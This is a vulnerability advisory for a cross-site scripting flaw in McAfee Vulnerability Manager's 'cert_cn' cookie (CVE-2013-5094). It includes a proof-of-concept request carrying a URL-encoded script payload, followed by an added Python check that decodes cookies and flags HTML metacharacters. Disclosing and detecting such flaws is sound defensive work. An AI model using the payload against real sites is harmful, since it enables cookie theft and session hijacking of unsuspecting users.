McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability
BID:58401
Info
| Bugtraq ID: | 58401 |
| Class: | Input Validation Error |
| CVE: | CVE-2013-5094 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 08 2013 12:00AM |
| Updated: | Jan 31 2014 01:43AM |
| Credit: | Asheesh Anaconda |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
McAfee Vulnerability Manager is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
McAfee Vulnerability Manager 7.5.0 and 7.5.1 are vulnerable; other versions may also be affected.
Exploit / POC
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example request is available:
GET /www.example.com/index.exp HTTP/1.1
Cookie: identity=p805oa53c0dab5vpcv1da30me7;
cert_cn=%27%22%28%29%26%251%3CScRiPt %3Eprompt%28920847%29%3C%2FScRiPt%3E;
remember=remember
Host: 172.28.1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
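
A defensive check for the request above, added here as an example and not part of the original advisory or the vendor's code: it parses the Cookie header, URL-decodes each value, flags values that contain HTML metacharacters, and returns the HTML-escaped form that is safe to write into a page. The function names and the assumption that the application URL-decodes the cookie before reflecting it are illustrative; the sample request is constructed from the one above with the Cookie header joined onto one line.

```python
import html
import re
from urllib.parse import unquote

# Characters that change meaning when a value is written into HTML unescaped.
HTML_META = re.compile(r"[<>\"'&]")

# Constructed sample: the advisory's request, Cookie header joined onto one line.
SAMPLE_REQUEST = (
    "GET /www.example.com/index.exp HTTP/1.1\r\n"
    "Cookie: identity=p805oa53c0dab5vpcv1da30me7; "
    "cert_cn=%27%22%28%29%26%251%3CScRiPt %3Eprompt%28920847%29%3C%2FScRiPt%3E; "
    "remember=remember\r\n"
    "Host: 172.28.1.1\r\n"
    "\r\n"
)


def parse_cookies(raw_request):
    """Return {name: raw_value} from every Cookie header in a raw HTTP request."""
    cookies = {}
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "cookie":
            continue
        for pair in value.split(";"):
            key, eq, val = pair.strip().partition("=")
            if eq:
                cookies[key] = val
    return cookies


def audit_cookies(raw_request):
    """List cookies whose URL-decoded value contains HTML metacharacters."""
    findings = []
    for name, raw in parse_cookies(raw_request).items():
        decoded = unquote(raw)  # assumption: the application decodes once
        if HTML_META.search(decoded):
            findings.append({
                "cookie": name,
                "decoded": decoded,
                # What the page should contain instead of the raw value.
                "safe_html": html.escape(decoded, quote=True),
            })
    return findings
```
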
Solution / Fix
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
References:
- McAfee Homepage (McAfee)